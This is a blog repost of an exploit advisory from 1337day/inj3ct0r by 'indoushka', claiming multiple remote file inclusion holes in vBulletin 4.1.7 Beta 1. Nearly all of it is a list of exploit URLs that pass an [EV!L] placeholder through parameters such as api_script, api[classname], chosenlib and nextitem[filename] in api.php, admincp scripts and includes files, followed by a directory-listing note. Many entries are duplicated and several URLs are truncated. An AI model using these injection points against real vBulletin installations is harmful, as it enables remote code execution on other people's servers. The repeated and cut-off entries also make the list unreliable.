É um aviso ... (ºLº)

vBulletin® Version 4.1.7 Beta 1 Mullti Vulnerability

sexta-feira, 9 de dezembro de 2011
================================================== ==
vBulletin® Version 4.1.7 Beta 1 Mullti Vulnerability
================================================== ==

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=0
0 . .--. .--. .---. . 1
1 .'| ) ) / | 0
0 | --: --: / .-.| .-. . . 1
1 | ) ) / ( |( ) | | 0
0 '---' `--' `--' ' `-'`-`-'`-`--| 1
1 ; 0
0 Site : 1337day.com `-' 1
1 Support e-mail : submit[at]inj3ct0r.com 0
0 >> Exploit database separated by exploit 1
1 type (local, remote, DoS, etc.) 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=1

################################################## #####

# Vendor: noLogging by SCRiPTZSECTOR.ORG

# Date: 2011-07-27

# Author : indoushka

+++=[ Dz Offenders Cr3w ]=+++

# KedAns-Dz * Caddy-Dz * Kalashinkov3

# Jago-dz * Kha&miX * T0xic * Ev!LsCr!pT_Dz

# Contact : ind0ushka@hotmail.com

# Tested on : win SP2 + SP3 Fr / Back | Track 5 fr

################################################## ######################

# Exploit By indoushka
-------------

Powered by vBulletin® Version 4.1.7 Beta 1

RFI :
Function: include File: api.php Line: 139
Exploit: http://localhost/vB1/api.php?api_script=[EV!L]

##################################################

Function: include File: api.php Line: 139
Exploit: http://localhost/vB1/api.php?api_script=[EV!L]

##################################################

Function: require_once File: payment_gateway.php Line: 3
Exploit: http://localhost/vB1/payment_gateway.php?api[classname]=[EV!L]

##################################################

Function: require_once File: payment_gateway.php Line: 3
Exploit: http://localhost/vB1/payment_gateway.php?api[classname]=[EV!L]

##################################################

Function: include_once File: cronadmin.php Line: 4
Exploit: http://localhost/vB1/admincp/cronadmin.php?nextitem[filename]=[EV!L]

##################################################

Function: include File: diagnostic.php Line: 12
Exploit: http://localhost/vB1/admincp/diagnostic.php?match[0]=[EV!L]

##################################################

Function: require_once File: diagnostic.php Line: 18
Exploit: http://localhost/vB1/admincp/diagnostic.php?api[classname]=[EV!L]

##################################################

Function: require_once File: diagnostic.php Line: 18
Exploit: http://localhost/vB1/admincp/diagnostic.php?api[classname]=[EV!L]

##################################################

Function: include_once File: plugin.php Line: 22
Exploit: http://localhost/vB1/admincp/plugin.php?safeid=[EV!L]

##################################################

Function: include_once File: plugin.php Line: 22
Exploit: http://localhost/vB1/admincp/plugin.php?safeid=[EV!L]

##################################################

Function: include_once File: class_block.php Line: 14
Exploit: http://localhost/vB1/includes/class_block.php?file=[EV!L]

##################################################

Function: require_once File: class_humanverify.php Line: 2
Exploit: http://localhost/vB1/includes/class_...php?chosenlib=[EV!L]

##################################################

Function: require_once File: class_humanverify.php Line: 2
Exploit: http://localhost/vB1/includes/class_...php?chosenlib=[EV!L]

##################################################

Function: require_once File: class_paid_subscription.php Line: 24
Exploit: http://localhost/vB1/includes/class_...php?methodinfo[classname]=[EV!L]

##################################################

Function: require_once File: class_paid_subscription.php Line: 24
Exploit: http://localhost/vB1/includes/class_...php?methodinfo[classname]=[EV!L]

##################################################

Function: require_once File: functions.php Line: 6
Exploit: http://localhost/vB1/includes/functions.php?classfile=[EV!L]

##################################################

Function: require_once File: functions.php Line: 6
Exploit: http://localhost/vB1/includes/functions.php?classfile=[EV!L]

##################################################

Function: include_once File: functions_cron.php Line: 8
Exploit: http://localhost/vB1/includes/functi...n.php?nextitem[filename]=[EV!L]

##################################################

Function: require File: vb.php Line: 7
Exploit: http://localhost/vB1/vb/vb.php?filename=[EV!L]

##################################################

Function: require_once File: class_upgrade.php Line: 48
Exploit: http://localhost/vB1/install/include...php?chosenlib=[EV!L]

##################################################

Function: require_once File: class_upgrade.php Line: 48
Exploit: http://localhost/vB1/install/include...php?chosenlib=[EV!L]

##################################################

Function: include_once File: attach.php Line: 80
Exploit: http://localhost/vB1/packages/vbatta...h.php?package=[EV!L]

##################################################

Function: include_once File: attach.php Line: 604
Exploit: http://localhost/vB1/packages/vbattach/attach.php?path=[EV!L]

##################################################

Function: include_once File: attach.php Line: 1222
Exploit: http://localhost/vB1/packages/vbattach/attach.php?path=[EV!L]

##################################################

Directory Listing ckeditor :

http://localhost/vB1/clientscript/ckeditor/

Divirta-se Assistindo

Loading...

Blog Archive

Blogger news